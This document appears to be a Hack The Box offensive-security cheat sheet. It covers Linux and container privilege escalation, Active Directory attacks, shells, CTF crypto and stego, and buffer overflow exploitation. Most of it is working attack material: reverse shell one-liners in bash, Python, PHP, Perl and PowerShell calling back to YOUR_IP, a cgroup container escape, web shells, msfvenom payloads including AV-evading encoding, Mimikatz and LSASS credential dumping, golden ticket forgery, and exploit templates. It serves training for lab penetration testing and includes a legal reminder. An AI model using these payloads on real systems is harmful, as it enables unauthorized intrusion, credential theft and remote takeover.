CVE-2016-5195	Dirty COW	Linux kernel < 4.8.3	Race condition, write to read-only mappings
CVE-2022-0847	Dirty Pipe	Linux kernel 5.8-5.16	Overwrite any read-only file incl. SUID binaries
MS17-010	EternalBlue	Windows 7/Server 2008	Classic HTB machine Blue, SMB RCE → SYSTEM
CVE-2019-1388	UAC Bypass	Windows 7-10	Certificate dialog LPE in older Windows

# Check kernel version first

uname -r && cat /etc/os-release

# Use linux-exploit-suggester

./les.sh 2>&1 | grep -E "CVE|Highly Probable"

# PwnKit (CVE-2021-4034) — check if vulnerable

dpkg -l policykit-1  # vulnerable if < 0.105-33 on Ubuntu/Debian

⚠

Container escapes are increasingly common on HTB — you land inside a Docker container and need to break out to the real host. Always check if you're in a container first.

Detect If You're in a Container

# Is there a .dockerenv file?

ls /.dockerenv && cat /proc/1/cgroup | grep docker

# Check hostname (often random hex in Docker)

hostname && cat /etc/hostname

# Minimal OS — few binaries, trimmed /etc

cat /etc/os-release && ls /

# Check for container runtime socket

find / -name "docker.sock" -o -name "containerd.sock" 2>/dev/null

Docker Socket Escape (Most Common)

If /var/run/docker.sock is mounted inside the container, you can talk to the Docker daemon and spin up a privileged container that mounts the host filesystem.

# Check if socket is accessible

ls -la /var/run/docker.sock

# If docker binary is available inside the container:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# This mounts the HOST root at /mnt and drops you into it as root

# If no docker binary, use the API directly via curl:

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | python3 -m json.tool

# Get image ID from output, then create a container:

curl -s --unix-socket /var/run/docker.sock -X POST "http://localhost/containers/create" \

  -H "Content-Type: application/json" \

  -d '{"Image":"IMAGE_ID","Cmd":["/bin/sh"],"Binds":["/:/mnt"],"Privileged":true}' | python3 -m json.tool

Privileged Container Escape

A --privileged container has access to all host devices. You can mount the host disk and read/write any file, or abuse cgroup release_agent for RCE on the host.

# Confirm privileged mode

cat /proc/self/status | grep CapEff

# CapEff: 0000003fffffffff → fully privileged

# Method 1: Mount host disk

fdisk -l  # find host disk (usually /dev/sda1 or /dev/xvda1)

mount /dev/sda1 /mnt && chroot /mnt

# Now in host filesystem as root — read shadow, add SSH key, etc.

# Method 2: cgroup release_agent RCE

mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg

mkdir /tmp/cg/x && echo 1 > /tmp/cg/x/notify_on_release

host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

echo "$host_path/cmd" > /tmp/cg/release_agent

echo '#!/bin/sh' > /cmd && echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" >> /cmd && chmod +x /cmd

sh -c "echo \$\$ > /tmp/cg/x/cgroup.procs"

LXD/LXC Group Escape

If your user is in the lxd group, you can create a privileged LXC container and mount the host root filesystem inside it.

# Check group membership

id | grep lxd

# Build Alpine image on YOUR machine and transfer

git clone https://github.com/saghul/lxd-alpine-builder && cd lxd-alpine-builder

sudo ./build-alpine && python3 -m http.server 8080

# On TARGET:

wget http://YOUR_IP:8080/alpine-v3.13-x86_64-*.tar.gz -O alpine.tar.gz

lxc image import alpine.tar.gz --alias pwn

lxc init pwn privesc -c security.privileged=true

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc && lxc exec privesc /bin/sh

# Inside container — host root is at /mnt/root

cat /mnt/root/root/root.txt

cp /mnt/root/bin/bash /mnt/root/tmp/rootbash && chmod +s /mnt/root/tmp/rootbash

▸Active Directory Attacks

// the most valuable skillset on HTB — AD is everywhere in enterprise

▸

Active Directory machines are worth learning more than anything else. Every enterprise uses AD. Forest, Active, Sauna, Resolute are essential starter AD boxes.

AD Enumeration First

# Enumerate with no creds (anonymous LDAP, null SMB sessions)

enum4linux-ng -A 10.10.10.X

ldapsearch -x -H ldap://10.10.10.X -b "DC=domain,DC=com"

# With valid creds — BloodHound is your best friend

bloodhound-python -u user -p pass -d domain.htb -c All -ns 10.10.10.X

# Then: open BloodHound GUI, upload JSON files, find paths

# With PowerShell (on Windows foothold)

Get-ADUser -Filter * -Properties * | Select SamAccountName,Description

Get-ADGroupMember "Domain Admins"

▸

ASREPRoasting — No Creds Needed

Accounts with "Do not require Kerberos preauthentication" return encrypted TGTs that can be cracked offline.

# From Linux (no creds needed if you have a user list)

impacket-GetNPUsers domain.htb/ -usersfile users.txt -format hashcat -outputfile asrep.txt

impacket-GetNPUsers domain.htb/ -no-pass -request -dc-ip 10.10.10.X

# Crack the hash

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

▸

Kerberoasting — Need Any Valid Creds

Request TGS tickets for service accounts (SPNs). The ticket is encrypted with the service account's password hash — crack it offline.

# From Linux

impacket-GetUserSPNs domain.htb/user:pass -dc-ip 10.10.10.X -request -outputfile tgs.txt

# From Windows (Rubeus)

.\Rubeus.exe kerberoast /outfile:tgs.txt

# Crack

hashcat -m 13100 tgs.txt rockyou.txt

▸

Pass-the-Hash (PtH)

Use an NTLM hash without cracking it to authenticate as that user.

impacket-psexec domain/user@10.10.10.X -hashes :NTLM_HASH

impacket-wmiexec domain/user@10.10.10.X -hashes :NTLM_HASH

evil-winrm -i 10.10.10.X -u user -H NTLM_HASH

crackmapexec smb 10.10.10.X -u user -H NTLM_HASH --exec-method smbexec

▸

Pass-the-Ticket (PtT)

Inject Kerberos tickets into your session to impersonate users.

# Export tickets (on Windows foothold)

.\Rubeus.exe dump /nowrap

.\mimikatz.exe "sekurlsa::tickets /export" exit

# Inject ticket

.\Rubeus.exe ptt /ticket:BASE64_TICKET

# From Linux with .ccache

export KRB5CCNAME=/tmp/ticket.ccache

impacket-psexec -k -no-pass domain/user@dc.domain.htb

▸

Credential Harvesting

# Mimikatz — dump creds from LSASS (requires SYSTEM)

.\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

lsadump::sam

# Remote SAM dump with secretsdump

impacket-secretsdump domain/user:pass@10.10.10.X

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

# LSASS dump (stealthier)

.\procdump.exe -ma lsass.exe lsass.dmp

# Then on your machine:

pypykatz lsa minidump lsass.dmp

▸

Password Spraying

Try one password against many users. Avoids lockout. Common on HTB AD boxes that have user lists available from LDAP/SMB.

crackmapexec smb 10.10.10.X -u users.txt -p 'Password123!' --continue-on-success

kerbrute passwordspray -d domain.htb --dc 10.10.10.X users.txt 'Password123!'

# Common password patterns: Season+Year, Company name, Welcome1

▸

DCSync — Dump All Domain Hashes

If you have Replication privileges (DS-Replication-Get-Changes-All), you can replicate the AD database and get every password hash.

impacket-secretsdump -just-dc domain/user:pass@10.10.10.X

impacket-secretsdump -just-dc-user krbtgt domain/user:pass@10.10.10.X

# With mimikatz (on DC or with DCSync rights)

lsadump::dcsync /user:krbtgt /domain:domain.htb

▸

Golden Ticket

Forge Kerberos TGTs using the krbtgt hash. Gives permanent, invisible domain admin access.

# Need: domain SID + krbtgt NTLM hash

impacket-secretsdump domain/user:pass@DC -just-dc-user krbtgt

impacket-lookupsid domain/user:pass@DC | grep "Domain SID"

# Forge golden ticket with ticketer

impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-X -domain domain.htb Administrator

export KRB5CCNAME=Administrator.ccache

impacket-psexec -k -no-pass domain.htb/Administrator@dc.domain.htb

▸

ACL Abuse (WriteDACL, GenericWrite, etc.)

BloodHound will reveal ACL misconfigurations. Common attack paths:

# GenericWrite on user → force ASREP-roastable or set SPN

Set-ADUser target -ServicePrincipalNames @{Add='fake/spn'}

# WriteDACL on domain → grant yourself DCSync

Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=htb" -PrincipalIdentity youruser -Rights DCSync

# ForceChangePassword

Set-ADAccountPassword -Identity target -Reset -NewPassword (ConvertTo-SecureString "Pass1!" -AsPlainText -Force)

Setup BloodHound

# Install neo4j + bloodhound

sudo neo4j start

bloodhound &

# Default: neo4j:neo4j → change on first login

# Collect data (Python, runs from Linux)

pip install bloodhound

bloodhound-python -u user -p pass -d domain.htb -c All -ns 10.10.10.X --zip

# Or use SharpHound on Windows

.\SharpHound.exe -c All --zipfilename loot.zip

Key BloodHound Queries

› "Find all Domain Admins"
› "Shortest Paths to Domain Admins"
› "Find Principals with DCSync Rights"
› "Shortest Path from Owned Principals"
› "Find Kerberoastable Users with Most Privileges"
› "Computers with Unsupported OS"
› "Users with Path to High Value Targets"

💡

Right-click any node in BloodHound → "Mark as Owned" after you compromise it. Then re-run "Shortest Path from Owned Principals" to find new attack paths that opened up.

Active Directory Certificate Services (ADCS) is one of the highest-impact attack vectors in modern AD environments. Misconfigured certificate templates let low-priv users request certs that allow domain admin impersonation. ESC1-ESC8 are the canonical escalation paths — ESC1, ESC3, ESC8 appear most on HTB.

Find Vulnerable Templates (Certipy)

# Enumerate all templates and find vulnerabilities

certipy find -u user@domain.htb -p 'Pass123!' -dc-ip 10.10.10.X -vulnerable -stdout

# From Windows (Certify.exe)

.\Certify.exe find /vulnerable

.\Certify.exe cas  # list all CAs

ESC1 — Any User Can Request Cert for Arbitrary SAN

Template allows Subject Alternative Names (SANs) to be specified by the requester + enrollee supply subject is enabled. Request a cert for the Administrator and authenticate as DA.

# Step 1: Request cert as Administrator using vulnerable template

certipy req -u user@domain.htb -p 'Pass123!' -dc-ip 10.10.10.X -ca 'CA-NAME' -template 'VulnTemplate' -upn administrator@domain.htb

# Output: administrator.pfx

# Step 2: Authenticate with the cert to get NTLM hash

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.X

# Output: administrator NTLM hash → pass-the-hash to get DA shell

impacket-psexec -hashes :NTLM_HASH administrator@10.10.10.X

ESC8 — NTLM Relay to AD CS HTTP Endpoint

If the CA Web Enrollment endpoint accepts NTLM authentication without EPA/signing, you can relay any machine account NTLM authentication to obtain a certificate for that machine, then extract its hash with PKINIT.

# Step 1: Start relay server pointing at CA web enrollment

certipy relay -ca 10.10.10.X -template DomainController

# Step 2: Coerce DC authentication (e.g. via PetitPotam)

python3 PetitPotam.py -u user -p pass YOUR_IP 10.10.10.X

# certipy relay catches the relay, issues DC$ cert

# Step 3: Use DC$ cert to get TGT and DCSync

certipy auth -pfx dc.pfx -dc-ip 10.10.10.X

impacket-secretsdump -hashes :HASH 'domain/dc$@10.10.10.X'

Shadow Credentials (RBCD + KeyCredentials)

# If you have GenericWrite/GenericAll over a computer/user object
# Add shadow credential to target's msDS-KeyCredentialLink
certipy shadow auto -u user@domain.htb -p 'Pass123!' -dc-ip 10.10.10.X -account targetuser
# Outputs .pfx and NTLM hash directly — no CA needed

Kerberos delegation lets services act on behalf of users. Misconfigured delegation = lateral movement to other services or full domain compromise. Three types: Unconstrained (dangerous), Constrained, and Resource-Based Constrained (RBCD).

Unconstrained Delegation — Capture TGTs

Any machine with unconstrained delegation caches TGTs for every user that authenticates to it. If you compromise this machine, extract all cached TGTs — including the DC's TGT if you coerce it.

# Find computers with unconstrained delegation

Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,DNSHostName

# OR:

impacket-findDelegation domain.htb/user:pass -dc-ip 10.10.10.X

# After getting SYSTEM on the unconstrained machine

# Coerce DC to authenticate to us (SpoolSample / PetitPotam / etc.)

python3 PetitPotam.py -u user -p pass UNCONSTRAINED_MACHINE_IP DC_IP

# Dump all tickets from LSASS

.\Rubeus.exe dump /nowrap

# Find DC$ TGT and inject it

.\Rubeus.exe ptt /ticket:BASE64_TGT

impacket-secretsdump -k domain.htb/dc$@dc.domain.htb -no-pass

Constrained Delegation — S4U2Proxy Abuse

A service with constrained delegation can impersonate any user (including DA) when accessing the specific services listed in its msDS-AllowedToDelegateTo attribute.

# Find constrained delegation accounts

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

impacket-findDelegation domain.htb/user:pass -dc-ip 10.10.10.X

# Abuse with getST.py (request service ticket as Administrator)

impacket-getST -spn 'cifs/dc.domain.htb' -impersonate Administrator 'domain.htb/svc_user:Password!'  -dc-ip 10.10.10.X

export KRB5CCNAME=Administrator.ccache

impacket-psexec -k -no-pass domain.htb/Administrator@dc.domain.htb

# With Rubeus from Windows

.\Rubeus.exe s4u /user:svc_user /password:Password! /impersonateuser:administrator /msdsspn:"cifs/dc.domain.htb" /ptt

Resource-Based Constrained Delegation (RBCD)

If you have GenericWrite or GenericAll over a computer object, you can configure it to trust your machine, then impersonate any user to it — including Administrator.

# Step 1: Create a fake computer account (or use existing machine acct)

impacket-addcomputer -computer-name 'FAKECPU$' -computer-pass 'FakePass123!' 'domain.htb/user:Pass123!'  -dc-ip 10.10.10.X

# Step 2: Set msDS-AllowedToActOnBehalfOfOtherIdentity on target

python3 rbcd.py -f FAKECPU -t TARGET_COMPUTER -dc-ip 10.10.10.X 'domain.htb/user:Pass123!'

# Step 3: Get service ticket impersonating Administrator

impacket-getST -spn 'cifs/target.domain.htb' -impersonate Administrator -dc-ip 10.10.10.X 'domain.htb/FAKECPU$:FakePass123!'

export KRB5CCNAME=Administrator.ccache

impacket-psexec -k -no-pass domain.htb/Administrator@target.domain.htb

▸Shells & Payloads

// every shell technique, upgrade trick, and pivoting method

Reverse Shell One-Liners

# ── LISTENER (your machine) ──────────────────────────
rlwrap nc -lvnp 4444 # always use rlwrap for arrow keys
pwncat-cs -lp 4444 # auto-upgrades + file upload built in

# ── BASH ─────────────────────────────────────────────
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
0<&196;exec 196<>/dev/tcp/YOUR_IP/4444; sh <&196 >&196 2>&196

# ── PYTHON ───────────────────────────────────────────
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# ── PHP ──────────────────────────────────────────────
php -r '$sock=fsockopen("YOUR_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# ── NETCAT (with -e) ─────────────────────────────────
nc YOUR_IP 4444 -e /bin/bash
nc YOUR_IP 4444 -e cmd.exe # Windows

# ── NETCAT (without -e, pipe trick) ──────────────────
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc YOUR_IP 4444 > /tmp/f

# ── PERL ─────────────────────────────────────────────
perl -e 'use Socket;$i="YOUR_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# ── RUBY ─────────────────────────────────────────────
ruby -rsocket -e 'spawn("/bin/sh",[:in,:out,:err]=>TCPSocket.new("YOUR_IP","4444"))'

# ── POWERSHELL ───────────────────────────────────────
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('YOUR_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$r=[Text.Encoding]::ASCII.GetBytes($sb+'PS '+(pwd).Path+'> ');$s.Write($r,0,$r.Length)}"

Shell Upgrade (Linux) — Full TTY

# Method 1: Python pty (most common)

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm SHELL=bash

# Ctrl+Z

stty raw -echo; fg

stty rows 45 cols 200

# Method 2: script command

script /dev/null -c bash

# Method 3: socat (cleaner, if socat available)

# On YOUR machine:

socat file:`tty`,raw,echo=0 tcp-listen:4444

# On target:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP:4444

Web Shells

# PHP minimal webshell
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_REQUEST['cmd']); ?>

# PHP b374k / p0wny — full-featured shells (upload as PHP)
# JSP (Java/Tomcat)
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

# ASPX (Windows IIS)
<%@ Page Language="C#"%><%Response.Write(System.Diagnostics.Process.Start("cmd","/c "+Request["c"]).StandardOutput.ReadToEnd());%>

# Interact:
curl "http://target/shell.php?cmd=id"
curl "http://target/shell.php" --data "cmd=whoami"

msfvenom Payloads

# Linux ELF

msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# Windows EXE

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Windows EXE (staged — needs multi/handler)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o meter.exe

# PHP

msfvenom -p php/reverse_php LHOST=IP LPORT=4444 -f raw -o shell.php

# WAR file (Tomcat)

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war

# MSI (Windows installer)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f msi -o evil.msi

# Encoded to evade basic AV

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o encoded.exe

Port Forwarding & Tunneling

# SSH local port forward — access internal service

ssh -L 8080:127.0.0.1:8080 user@10.10.10.X  # then browse to localhost:8080

# SSH dynamic SOCKS proxy

ssh -D 1080 user@10.10.10.X

proxychains nmap -sT 172.16.0.0/24  # scan internal network

# Chisel — tunneling over HTTP

# Your machine:

./chisel server -p 8000 --reverse

# Target:

./chisel client YOUR_IP:8000 R:socks

# Then use proxychains

# ligolo-ng (cleaner, recommended)

./proxy -selfcert -laddr 0.0.0.0:11601  # your machine

./agent -connect YOUR_IP:11601 -ignore-cert  # target

▸Crypto, Stego & Forensics

// CTF-style challenges and misc techniques that appear on HTB

🔐 Common Encoding/Encryption

# Base64

echo 'string' | base64

echo 'ENCODED' | base64 -d

# Hex

echo '48656c6c6f' | xxd -r -p

echo 'Hello' | xxd

# ROT13

echo 'string' | tr 'A-Za-z' 'N-ZA-Mn-za-m'

# URL decode

python3 -c "import urllib.parse; print(urllib.parse.unquote('%48%65%6c%6c%6f'))"

# CyberChef — use for everything complex

# gchq.github.io/CyberChef

🕵️ Hash Identification

# Length clues:

32 chars  → MD5

40 chars  → SHA1

56 chars  → SHA224

64 chars  → SHA256

96 chars  → SHA384

128 chars → SHA512

$1$...   md5crypt

$6$...   sha512crypt

$2b$...  bcrypt

hash-identifier 'HASH'

haiti 'HASH'

Steganography

# Check file type (magic bytes)

file suspicious.jpg && exiftool suspicious.jpg

# Strings — look for hidden text

strings suspicious.png | grep -i "htb\|flag\|pass\|secret"

# Binwalk — extract hidden files

binwalk suspicious.jpg

binwalk -e suspicious.jpg  # extract embedded files

# steghide — extract hidden data (may need password)

steghide info suspicious.jpg

steghide extract -sf suspicious.jpg -p ""  # try blank password

stegseek suspicious.jpg rockyou.txt  # brute-force steghide password

# zsteg — PNG/BMP LSB steganography

zsteg suspicious.png

# Audacity / Sonic Visualizer — audio stego

# Look at spectrogram view for hidden images/text

Password Protected Files

# ZIP password

zip2john secret.zip > zip.hash && john zip.hash --wordlist=rockyou.txt

hashcat -m 13600 zip.hash rockyou.txt

# SSH private key passphrase

ssh2john id_rsa > id_rsa.hash && john id_rsa.hash --wordlist=rockyou.txt

# PDF password

pdf2john secret.pdf > pdf.hash && john pdf.hash --wordlist=rockyou.txt

# KeePass .kdbx

keepass2john database.kdbx > kp.hash && john kp.hash --wordlist=rockyou.txt

OpenSSL & Certificate Inspection

# Inspect SSL certificate (often contains hostnames)

openssl s_client -connect 10.10.10.X:443 2>/dev/null | openssl x509 -noout -text

# Decrypt RSA with known private key

openssl rsautl -decrypt -inkey private.key -in cipher.bin -out plain.txt

# Crack RSA with small modulus (CTF)

python3 -c "from Crypto.PublicKey import RSA; k=RSA.import_key(open('pub.pem').read()); print(k.n, k.e)"

# Then factor n using factordb.com if small enough

▸The Hacker Mindset

// what separates people who pop boxes from those who quit

🔄

Enumerate More

If you've been stuck for 20+ minutes, you've missed something. Make a list: every service, every port, every user, every directory. Re-run scans with different options. The answer is always there.

🧩

Connect the Dots

Boxes are stories. A credential in a config file opens an SSH session. A username from SMB enables a password spray. A port you ignored 3 hours ago is the actual entry point. Keep asking: how does everything connect?

🚨

Recognize Rabbit Holes

Set a 30-minute timer on any single path. If you have nothing after 30 minutes, explicitly stop, list what you haven't tried, and pivot. Depth is dangerous — breadth first.

📝

Document Everything

Use Obsidian, Notion, CherryTree, or just a text file. Note every service version, username, password, interesting path, and error message. Patterns only emerge with a full picture.

🧠

Understand, Don't Copy

Running a PoC you don't understand teaches nothing. Before using any exploit: read the CVE, understand the vulnerability class, trace the code. This makes you dangerous across all future boxes.

😤

Embrace the Stuck

The frustration IS the learning. Every box that makes you feel stupid teaches you 10x more than one that fell in 30 minutes. The struggle builds intuition that can't be taught any other way.

▸Pre-Box Checklist

// run through this before and during every machine

✓
Connected to HTB VPN — confirmed with ip a show tun0
✓
Created folder structure: ~/htb/MachineName/{nmap,web,exploits,loot}
✓
Full nmap scan complete (both common + all ports)
✓
Added hostname to /etc/hosts if found in nmap results or SSL cert
✓
Noted every open port and service version in notes
✓
Identified OS (changes entire approach: Linux vs Windows)
✓
Web: ran gobuster/ffuf AND checked for vhosts
✓
SMB/FTP: attempted anonymous/null session access
✓
Checked searchsploit for every service version found
✓
Listener running (rlwrap nc -lvnp 4444) before triggering any exploit
✓
Got a stable TTY shell (not a dumb netcat shell)
✓
Ran linPEAS/winPEAS after initial foothold
✓
Captured user.txt and submitted the flag
✓
Captured root.txt and submitted the flag
✓
Wrote a post-box writeup with kill chain + lessons learned

▸Skill Progression Roadmap

// honest estimates — assumes 1-2 hours of focused daily practice

Linux CLI fluency

2 wks

Nmap + enumeration

1 wk

Web attacks (SQLi/LFI/upload)

3 wks

Linux privilege escalation

3 wks

Windows enumeration + privesc

5 wks

Active Directory basics

6 wks

Advanced AD (ACL abuse, delegation)

3 mos

Buffer overflows (BOF)

3 mos

Reverse engineering

6+ mos

▸Resources & Learning Path

// curated resources — quality over quantity

🎓

HTB Academy

The Penetration Tester job-role path covers everything systematically with guided labs. Start here if you're new. The "Getting Started" module is free and excellent. Covers web, AD, PrivEsc, shells comprehensively.

📺

IppSec — YouTube

The definitive HTB content creator. Walkthroughs of every retired machine. Watch his process: how he reads nmap output, what he investigates first, how he thinks when stuck. Best free resource bar none.

🏫

TryHackMe

More guided than HTB — better for absolute beginners. Complete the Pre-Security path, then Jr Penetration Tester before returning to HTB machines. Free tier is sufficient to start.

📚

HackTricks

book.hacktricks.xyz — comprehensive attack wiki. When you find a weird service or technology, search here immediately. Covers every protocol, OS, and attack vector with concrete commands.

🔖

GTFOBins + LOLBAS

Always open while working. gtfobins.github.io for Linux sudo/SUID/capability abuse. lolbas-project.github.io for Windows living-off-the-land binaries. Bookmark both.

📦

SecLists

github.com/danielmiessler/SecLists — the wordlist collection. Install: sudo apt install seclists. Has wordlists for directories, usernames, passwords, FTP/SSH, API fuzzing, LFI paths, and more.

⚙️

revshells.com

Generate reverse shell payloads in any language with your IP/port pre-filled. Filter by OS, language, or encoding. Massive time saver. Also generates upgrade commands automatically.

🍳

CyberChef

gchq.github.io/CyberChef — Swiss army knife for data transformation. Base64, hex, XOR, AES decrypt, JWT decode, regex, format conversion, all chainable. Lives permanently in your browser tabs.

▸Structured Learning Path

// the fastest route from zero to consistently hacking medium machines

1

Foundation — Linux, Networking, Python Basics

Non-negotiable prerequisites. You can't hack without CLI fluency. Learn: file navigation, permissions, users, processes, grep/awk/sed, bash scripting basics, TCP/IP, DNS, HTTP. TryHackMe "Pre-Security" covers all of this.

TryHackMe: Pre-Security path (~40 hours)
OverTheWire Bandit (Linux basics as a game)
Python for offensive security (automate everything)

2

First 10 Retired Easy Machines (with IppSec)

For each machine: try solo for 30 minutes → watch IppSec → do it again from scratch without notes. Focus on understanding the why, not just repeating the commands. Start: Lame, Jerry, Blue, Nibbles, Shocker, Beep, Bashed, Networked.

3

Deep Dive: Web Attacks

Complete HTB Academy's "Web Attacks" module. Supplement with PortSwigger Web Security Academy labs (free, best web hacking practice anywhere). Focus on SQLi, XSS, SSRF, file upload, command injection, IDOR. You will encounter all of these on real boxes.

PortSwigger Web Security Academy (free, excellent labs)
HTB Academy: Web Attacks module
PentesterLab for burp practice

4

Master Privilege Escalation

Take TryHackMe "Linux PrivEsc" and "Windows PrivEsc" rooms. Then do HTB Academy's PrivEsc modules. Memorize the sudo -l → GTFOBins workflow. Know potato attacks cold. Practice on dedicated PrivEsc machines before real HTB boxes.

5

Active Machines — Solve Solo

By now you have the foundation. Attempt currently active machines before looking at any hints. Use only HackTricks for technique research. When stuck, enumerate more — hints are for after you've exhausted your options.

6

Active Directory Specialization

Complete HTB Academy's "Active Directory Enumeration & Attacks" path. Do Forest, Active, Sauna, Resolute in order. Learn BloodHound deeply — it changes how you see AD networks. This is the highest-ROI skill for real-world pentesting.

7

Certifications (Optional but Valuable)

Consider OSCP (Offensive Security Certified Professional) — the gold standard. HTB practice maps directly to OSCP exam style. Also consider eJPT (entry level) → eCPPT (intermediate) → OSCP (professional).

eJPT — good first cert, beginner friendly
HTB CPTS — HTB's own cert, growing reputation
OSCP — industry standard, requires 24h exam

🚫

Legal Reminder: Every technique in this guide must only be applied on systems you have explicit written authorization to test. Unauthorized access is a criminal offense in every jurisdiction regardless of intent, skill level, or educational purpose. HTB machines are the safe legal sandbox — keep it there.

▸Buffer Overflow Exploitation

// smash the stack — from crash to shell step by step

▸

BOF appears on OSCP and HTB Hard/Insane machines. The method is mechanical — follow these steps every time and you will get a shell. Practice on VulnServer and SLMail first.

Stack Memory Layout During Overflow

HIGH ADDR

RETURN ADDRESS (EIP) ← we overwrite this

SAVED EBP (4 bytes)

BUFFER SPACE (variable size)

LOW ADDR

BUFFER START ← input goes here

// AFTER OVERFLOW:

EIP

JMP ESP address (from DLL)

ESP →

SHELLCODE (msfvenom payload)

NOP SLED \x90\x90\x90…

JUNK PADDING (A × offset)

Step-by-Step Exploit Development

1

Crash the Application — Find Rough Buffer Size

# Python3 fuzzer — send increasing buffers until crash

cat > fuzzer.py <<'EOF'

import socket, time, sys

ip = "TARGET_IP"; port = TARGET_PORT

prefix = "OVERFLOW1 "; timeout = 5; buffer = ""

while True:

    buffer += "A" * 100

    try:

        s = socket.socket(); s.settimeout(timeout)

        s.connect((ip, port)); s.recv(1024)

        s.send(bytes(prefix + buffer + "\r\n", "latin-1"))

        s.recv(1024); s.close()

        print(f"Sent {len(buffer)} bytes — no crash")

    except: print(f"CRASH at ~{len(buffer)} bytes"); sys.exit()

    time.sleep(1)

EOF

python3 fuzzer.py

2

Find Exact EIP Offset with Cyclic Pattern

# Generate unique pattern (use crash_size + 400)

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

# OR with pwntools:

python3 -c "from pwn import *; print(cyclic(2400).decode())"

# Send pattern, note EIP value in Immunity Debugger

# Then find offset:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2400 -q 386F4337

# OR:

python3 -c "from pwn import *; print(cyclic_find(0x386F4337))"

3

Confirm EIP Control

# Send: offset bytes of A's + "BBBB" + C's

# EIP should be 42424242 (BBBB), ESP should point to C's

payload = b"A" * OFFSET + b"BBBB" + b"C" * 200

4

Find Bad Characters

# Generate all bytes \x01-\xff
python3 -c "print(''.join(f'\\\\x{i:02x}' for i in range(1,256)))"

# Send after EIP with all chars, compare ESP dump in Immunity
# Look for truncated/altered bytes — these are badchars
# Remove found badchars, repeat until clean
# \x00 is almost always a badchar (null terminator)

5

Find JMP ESP Instruction (No ASLR/DEP)

# In Immunity Debugger with mona.py:

!mona modules   # find DLL with no protections

!mona find -s "\xff\xe4" -m essfunc.dll  # find JMP ESP

# OR with pwntools (Linux target):

ROPgadget --binary vuln --rop | grep "jmp esp"

ropper -f vuln --search "jmp esp"

# Write address in LITTLE ENDIAN:

# 0x625011af → \xaf\x11\x50\x62

python3 -c "import struct; print(struct.pack('<I', 0x625011af))"

6

Generate Shellcode + Build Final Exploit

# Generate shellcode (exclude badchars with -b)
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f py

# Final exploit structure:
payload = b"A" * OFFSET # fill buffer
payload += b"\xaf\x11\x50\x62" # JMP ESP (little endian)
payload += b"\x90" * 16 # NOP sled
payload += shellcode # your msfvenom payload

# Send and catch shell: rlwrap nc -lvnp 4444

Linux x64 BOF with pwntools

# Check binary protections
checksec --file=./vuln
# Output: Arch, RELRO, Stack Canary, NX, PIE, RPATH

# No protections: classic ret2shellcode
# NX enabled: ret2libc or ROP chain
# PIE enabled: need leak to defeat ASLR

# Basic pwntools template
from pwn import *
elf = ELF('./vuln') # load binary
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rop = ROP(elf)
context.binary = elf
p = process('./vuln') # or remote('ip', port)

# Find offset with cyclic
pattern = cyclic(200)
p.sendline(pattern)
p.wait()
core = p.corefile
offset = cyclic_find(core.rsp) # or core.eip for 32-bit
print(f"Offset: {offset}")

ret2libc (NX Enabled, No PIE)

# Find gadgets for ROP chain
ROPgadget --binary vuln --rop 2>/dev/null | grep "pop rdi"
objdump -d vuln | grep -A2 "puts@plt"

# Leak libc address, calculate base, find system()
pop_rdi = elf.address + 0x1234 # pop rdi; ret gadget
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']

payload = b"A" * offset
payload += p64(pop_rdi)
payload += p64(puts_got) # leak puts address
payload += p64(puts_plt)
payload += p64(main) # return to main for stage 2

p.sendlineafter(b":", payload)
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.sym['puts']
print(hex(libc.address)) # libc base

Key Tools

